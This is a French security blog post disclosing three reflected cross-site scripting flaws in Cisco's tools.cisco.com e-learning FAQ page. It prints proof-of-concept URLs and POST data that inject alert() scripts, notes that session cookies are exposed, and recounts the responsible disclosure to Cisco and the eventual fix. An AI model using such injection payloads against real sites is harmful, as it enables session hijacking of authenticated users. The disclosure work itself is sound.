[Contribution] Multiples Cross-Site Scripting chez Cisco

31
oct.
2015
  • Google Plus
  • LinkedIn
  • Viadeo
Posted by: Yann C.  /   Category: Contributions / Vulnérabilités, exploits et PoC / XSS   /   Pas de commentaire

Plusieurs vulnérabilités de type Cross-Site Scripting réfléchies (RXSS) ont été décelées sur un sous-domaine de Cisco.

Cisco Systems est une entreprise spécialisée à l’origine dans le matériel réseau (routeur et commutateur ethernet), et depuis 2009 dans les serveurs et les réseaux. Cisco est le leader mondial d’équipement réseau pour l’Internet. 85% du trafic de part le monde transite au travers d’équipements Cisco. L’entreprise équipe, assure le support et l’exploitation de la plupart des majors de l’industrie mondiale.

Cisco.com dispose de nombreux sous-domaines, notamment « tools.cisco.com » dont la plupart des outils en-lignes disponibles nécessitent une authentification (fédération / SSO entre services). La création d’un compte se fait très rapidement, et par conséquent il est possible d’accéder à ces services tout en disposant d’une session authentifiée via un cookie.

Tools.cisco.com propose un service d’e-learning, et celui-ci s’avère vulnérable à de multiple Cross-Site Scripting réfléchis (RXSS).

Proof-of-Concept n°1 :

Le paramètre GET « resetfaq » n’est pas convenablement nettoyé / vérifié / sanitized avant d’être réutilisé au sein du corps de la page.

http://tools.cisco.com/elearning/faqnet/faq/jsp/faqcontroller.jsp?action=faqList&type=0:1&module=FAQ&appid=12570&rootcatid=12570&resetfaq=1"><script>alert(/Reflected XSS - Yann CAM @ASAfety/);</script><input type="hidden&list=all&type=0:1>
RXSS tools.cisco.com n°1

RXSS tools.cisco.com n°1

L’injection au sein du code n’applique aucun filtre ni traitement de protection :

RXSS tools.cisco.com n°1 source code

RXSS tools.cisco.com n°1 source code

Ces espaces d’e-learning étant destinés à des utilisateurs authentifiés (partenaires, fournisseurs, intégrateurs, particuliers…), le cookie de session est donc disponible pour un éventuel assaillant :

RXSS tools.cisco.com cookie

RXSS tools.cisco.com cookie

Proof-of-Concept n°2 :

Le paramètre GET « list » n’est pas convenablement nettoyé / vérifié / sanitized avant d’être réutilisé au sein du corps de la page.

http://tools.cisco.com/elearning/faqnet/faq/jsp/faqcontroller.jsp?action=faqList&type=0:1&module=FAQ&appid=12570&rootcatid=12570&resetfaq=1&list=all"><script>alert(/Reflected XSS - Yann CAM @ASAfety/);</script><input type="hidden&type=0:1>
RXSS tools.cisco.com n°2 source code

RXSS tools.cisco.com n°2 source code

Proof-of-Concept n°3 :

Le paramètre POST « keyword » n’est pas convenablement nettoyé / vérifié / sanitized avant d’être réutilisé au sein du corps de la page.

http://tools.cisco.com/elearning/faqnet/faq/jsp/faqcontroller.jsp

Données POST :

action=faqAdvanceSearch&appid=12570&module=FAQ&targetID=12570&resetfaq=1&list=all&type=0%3A1&keyword="><script>alert(/Reflected XSS - Yann CAM @ASAfety/);</script><input type="hidden" value="&Submit=Search

Rendu :

RXSS tools.cisco.com n°3

RXSS tools.cisco.com n°3

Alerte et échanges

Les équipes du PSIRT de Cisco ont été alertées vis-à-vis de ces vulnérabilités. Suite à un email de remerciement, l’alerte a été transmise aux équipes du CSIRT qui s’occupe de la sécurité des différents espaces online de Cisco :

Hi Yann,

Thanks for passing on this information. We take genuine security threats seriously at Cisco, and have ensured your report has reached the right place for review and inspection.

Thanks,
Jin Yang

Après une relance pour obtenir un statut de correction quelques mois plus tard, les vulnérabilités ont finalement été comblées. L’outil d’e-learning traite à présent convenablement l’injection de code JavaScript arbitraire :

RXSS corrigées

RXSS corrigées

Je salue les équipes PSIRT et CSIRT de Cisco pour leur amabilité, leur disponibilité et la qualité de leurs services.

Sources & ressources :

  • Google Plus
  • LinkedIn
  • Viadeo
Yann C.

About the Author : Yann C.

Consultant en sécurité informatique et s’exerçant dans ce domaine depuis le début des années 2000 en autodidacte par passion, plaisir et perspectives, il maintient le portail ASafety pour présenter des articles, des projets personnels, des recherches et développements, ainsi que des « advisory » de vulnérabilités décelées notamment au cours de pentest.